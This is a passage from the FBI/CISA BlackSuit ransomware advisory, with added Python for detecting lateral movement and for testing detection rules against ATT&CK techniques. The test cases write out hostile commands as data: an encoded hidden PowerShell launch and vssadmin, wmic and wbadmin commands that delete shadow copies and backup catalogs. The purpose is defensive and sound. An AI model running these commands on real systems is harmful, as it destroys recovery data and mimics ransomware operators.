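            # Sliding window: distinct hosts reached from this logon onward within `window`.
            reached = {dst for ts, dst in logons[i:] if ts - start <= window}
            peak = max(peak, len(reached))
        if peak >= threshold:
            alerts.append({"account": account, "source": src, "distinct_hosts": peak})
    return alerts


def is_machine_or_system(account):
    return account.endswith("$") or account.upper() == "NT AUTHORITY\\SYSTEM"


def detect_unapproved_privileged_logons(events, approved=APPROVED_ADMINS):
    """4672 events for accounts that are neither approved admins nor built-in identities."""
    return [{"account": e["account"], "host": e["dst"], "ts": e["ts"].isoformat()}
            for e in events
            if e["id"] == 4672 and not is_machine_or_system(e["account"])
            and e["account"] not in approved]


def analyse(raw_events=SAMPLE_EVENTS):
    events = [parse_event(r) for r in raw_events]
    return {"lateral_movement": detect_fanout(events),
            "unapproved_admin": detect_unapproved_privileged_logons(events)}


if __name__ == "__main__":
    for category, findings in analyse().items():
        print(category)
        for finding in findings:
            print("  ", finding)
```

On the constructed data the svc-scan account is reported twice: once for touching five hosts from a workstation inside the window, and once for appearing in a 4672 event without being on the approved list. The threshold and window are the tuning knobs; an EDR or SIEM would apply the same logic with a per-host baseline rather than a fixed number.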


SOFTWARE MANUFACTURERS

The above mitigations apply to enterprises and critical infrastructure
organizations with on-premises or hybrid environments. Recognizing that insecure
software is the root cause of the majority of these flaws and that the
responsibility should not be on the end user, CISA urges software manufacturers
to implement the following to reduce the prevalence of the weaknesses exploited
by BlackSuit actors (e.g., misconfigurations, weak passwords, and the other
weaknesses described in this advisory):

 * Embed security into product architecture throughout the entire software
   development lifecycle (SDLC).
 * Mandate MFA, ideally phishing-resistant MFA, for privileged users and make
   MFA a default, rather than opt-in, feature.

These mitigations align with tactics provided in the joint guide Shifting the
Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design
Software. CISA urges software manufacturers to take ownership of improving the
security outcomes of their customers by applying these and other secure by
design tactics. By using secure by design tactics, software manufacturers can
make their product lines secure “out of the box” without requiring customers to
spend additional resources on configuration changes, on purchasing security
software and collecting and monitoring logs, and on routine updates.

For more information on secure by design, see CISA’s Secure by Design webpage.


VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI and CISA recommend exercising,
testing, and validating your organization's security program against the threat
behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory.
The FBI and CISA recommend testing your existing security controls inventory to
assess how they perform against the ATT&CK techniques described in this
advisory.

To get started:

 1. Select an ATT&CK technique described in this advisory (see Table 18 – Table
    23).
 2. Align your security technologies against the technique.
 3. Test your technologies against the technique.
 4. Analyze your detection and prevention technologies’ performance.
 5. Repeat the process for all security technologies to obtain a set of
    comprehensive performance data.
 6. Tune your security program, including people, processes, and technologies,
    based on the data generated by this process.

The FBI and CISA recommend continually testing your security program, at scale,
in a production environment to ensure optimal performance against the MITRE
ATT&CK techniques identified in this advisory.
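
Steps 1 through 6 above describe a loop: pick a technique, line up the controls that should catch it, execute test cases, and record which cases each control caught. The following is an added example of that loop in code, not code from CISA, the FBI, or this advisory. The three detection rules, the jump-host list, and the telemetry events are constructed assumptions standing in for an organization's real EDR or SIEM rules and for adversary emulation of each technique; the technique IDs are ATT&CK identifiers, but the test cases are not drawn from this advisory's tables.

```python
"""Run detection controls against ATT&CK technique test cases and report,
per technique, how many cases were detected and which were missed
(added example; constructed rules and telemetry)."""
import re

# Assumption: hosts from which administrators are expected to start RDP sessions.
JUMP_HOSTS = {"JUMP01"}


def rule_encoded_powershell(ev):
    """T1059.001: PowerShell started with an encoded command line."""
    if ev["type"] != "process" or ev["image"].lower() != "powershell.exe":
        return False
    return re.search(r"-enc(odedcommand)?\b", ev["cmdline"], re.IGNORECASE) is not None


def rule_shadow_copy_deletion(ev):
    """T1490: volume shadow copies deleted with vssadmin or wmic."""
    if ev["type"] != "process" or ev["image"].lower() not in {"vssadmin.exe", "wmic.exe"}:
        return False
    cmd = ev["cmdline"].lower()
    return "shadow" in cmd and "delete" in cmd


def rule_rdp_from_unexpected_host(ev):
    """T1021.001: RDP logon (type 10) originating anywhere but a jump host."""
    return ev["type"] == "logon" and ev["logon_type"] == 10 and ev["src"] not in JUMP_HOSTS


CONTROLS = {
    "encoded_powershell": rule_encoded_powershell,
    "shadow_copy_deletion": rule_shadow_copy_deletion,
    "rdp_from_unexpected_host": rule_rdp_from_unexpected_host,
}

# Step 1: constructed executions per technique, deliberately including
# variants an adversary might pick to sidestep a narrowly written rule.
TECHNIQUE_TESTS = {
    "T1059.001 PowerShell": [
        {"name": "-EncodedCommand", "event": {"type": "process", "image": "powershell.exe",
         "cmdline": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAo..."}},
        {"name": "-e short flag", "event": {"type": "process", "image": "powershell.exe",
         "cmdline": "powershell.exe -nop -w hidden -e SQBFAFgAIAAo..."}},
    ],
    "T1490 Inhibit System Recovery": [
        {"name": "vssadmin delete shadows", "event": {"type": "process", "image": "vssadmin.exe",
         "cmdline": "vssadmin.exe delete shadows /all /quiet"}},
        {"name": "wmic shadowcopy delete", "event": {"type": "process", "image": "wmic.exe",
         "cmdline": "wmic.exe shadowcopy delete"}},
        {"name": "wbadmin delete catalog", "event": {"type": "process", "image": "wbadmin.exe",
         "cmdline": "wbadmin.exe delete catalog -quiet"}},
    ],
    "T1021.001 Remote Desktop Protocol": [
        {"name": "RDP from workstation", "event": {"type": "logon", "logon_type": 10,
         "src": "WS-ALICE", "dst": "SRV-FILE01"}},
        {"name": "RDP from compromised jump host", "event": {"type": "logon", "logon_type": 10,
         "src": "JUMP01", "dst": "SRV-FILE01"}},
    ],
}


def evaluate(controls=CONTROLS, tests=TECHNIQUE_TESTS):
    """Steps 2-5: run every control against every test case and collect results."""
    results = {}
    for technique, cases in tests.items():
        detected, gaps, fired_by = 0, [], set()
        for case in cases:
            fired = [name for name, rule in controls.items() if rule(case["event"])]
            if fired:
                detected += 1
                fired_by.update(fired)
            else:
                gaps.append(case["name"])
        results[technique] = {"detected": detected, "total": len(cases),
                              "controls": sorted(fired_by), "gaps": gaps}
    return results


def techniques_needing_tuning(results):
    """Step 6 input: techniques where at least one execution went undetected."""
    return [technique for technique, r in results.items() if r["gaps"]]


if __name__ == "__main__":
    res = evaluate()
    for technique, r in res.items():
        print(f"{technique}: {r['detected']}/{r['total']} detected by {r['controls']}; "
              f"missed: {r['gaps']}")
    print("tune:", techniques_needing_tuning(res))
```

Each technique here ends up with a gap, which is the point of the exercise: the rule keyed on -EncodedCommand misses the -e short flag, the shadow-copy rule does not cover wbadmin, and an RDP rule that trusts the jump host is blind to an attacker who has already reached it. Those gaps are the data that step 6 feeds back into rules, processes, and people.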


RESOURCES

 * Stopransomware.gov is a whole-of-government approach that gives one central
   location for ransomware resources and alerts.
 * Resource to mitigate a ransomware attack: CISA-Multi-State Information
   Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.
   Note: The joint Ransomware Guide provides preparation, prevention, and
   mitigation best practices as well as a ransomware response checklist.
 * No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware
   Readiness Assessment.


REPORTING

Your organization has no obligation to respond or provide information back to
the FBI in response to this joint CSA. If, after reviewing the information
provided, your organization decides to provide information to the FBI, reporting
must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include boundary
logs showing communication to and from foreign IP addresses, a sample ransom
note, communications with BlackSuit actors, Bitcoin wallet information,
decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include: a targeted company point of contact,
status, and scope of infection, estimated loss, operational impact, transaction
IDs, date of infection, date detected, initial attack vector, and host- and
network-based indicators.

The FBI and CISA do not encourage paying ransom as payment does not guarantee
victim files will be recovered. Furthermore, payment may also embolden
adversaries to target additional organizations, encourage other criminal actors
to engage in the distribution of ransomware, and/or fund illicit activities.
Regardless of whether you or your organization have decided to pay the ransom,
the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s
Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the
agency’s Incident Reporting System or its 24/7 Operations Center
(report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472)).


DISCLAIMER

Your organization has no obligation to respond or provide information in
response to this product. If, after reviewing the information provided, your
organization decides to provide information to the authoring agencies, it must
do so consistent with applicable state and federal law.

The information in this report is being provided “as is” for informational
purposes only. FBI and CISA do not endorse any commercial entity, product,
company, or service, including any entities, products, or services linked within
this document. Any reference to specific commercial entities, products,
processes, or services by service mark, trademark, manufacturer, or otherwise,
does not constitute or imply endorsement, recommendation, or favoring by FBI and
CISA.


VERSION HISTORY

January 31, 2023: Initial Release (Royal Ransomware)

November 13, 2023: First Update (Royal Ransomware)

August 7, 2024: Updated title from “Royal Ransomware” to “BlackSuit Ransomware”;
updates noted throughout.

This product is provided subject to this Notification and this Privacy &
Use policy.


TAGS

Topics
Cyber Threats and Advisories, Incident Detection, Response, and Prevention,
Malware, Phishing, and Ransomware
Audience
Educational Institutions
Sector
Communications Sector, Critical Manufacturing Sector, Healthcare and Public
Health Sector
MITRE ATT&CK TTP
Command and Control (TA0011), Defense Evasion (TA0005), Impact (TA0040), Initial
Access (TA0001), Privilege Escalation (TA0004), Resource Development (TA0042)
Co-Sealers and Partners
Federal Bureau of Investigation
